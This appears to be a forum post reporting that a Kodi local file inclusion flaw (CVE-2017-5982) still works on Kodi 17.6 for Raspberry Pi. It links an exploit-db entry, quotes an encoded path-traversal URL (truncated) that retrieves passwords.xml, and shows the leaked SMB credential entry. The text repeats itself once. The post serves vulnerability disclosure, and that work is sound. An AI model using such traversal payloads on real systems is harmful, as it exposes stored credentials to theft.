2018-09-20, 03:31
I believe the Local File Include (CVE-2017-5982) is back.
I know that bool CFileUtils::ZebraListAccessCheck(const std:tring &filePath) from xbmc/xbmc/utils/FileUtils.cpp is supposed to block access, it doesn't.
The code from:
https://www.exploit-db.com/exploits/41312/
Still works on:
NOTICE: Starting Kodi (17.6). Platform: Linux ARM (Thumb) 32-bit
NOTICE: Using Release Kodi x32 build (version for Raspberry Pi)
Kodi compiled Jun 7 2018 by GCC 6.3.0 for Linux ARM (Thumb) 32-bit version 4.9.30 (264478)
http://pi/image/image%3A%2F%2F%2e%2e%252...swords.xml
<passwords> <path> <from pathversion="1">smb://smb/media</from> <to pathversion="1">smb://username:password@smb/media/</to> </path> </passwords>
I know that bool CFileUtils::ZebraListAccessCheck(const std:tring &filePath) from xbmc/xbmc/utils/FileUtils.cpp is supposed to block access, it doesn't.
The code from:
https://www.exploit-db.com/exploits/41312/
Still works on:
NOTICE: Starting Kodi (17.6). Platform: Linux ARM (Thumb) 32-bit
NOTICE: Using Release Kodi x32 build (version for Raspberry Pi)
Kodi compiled Jun 7 2018 by GCC 6.3.0 for Linux ARM (Thumb) 32-bit version 4.9.30 (264478)
http://pi/image/image%3A%2F%2F%2e%2e%252...swords.xml
<passwords> <path> <from pathversion="1">smb://smb/media</from> <to pathversion="1">smb://username:password@smb/media/</to> </path> </passwords>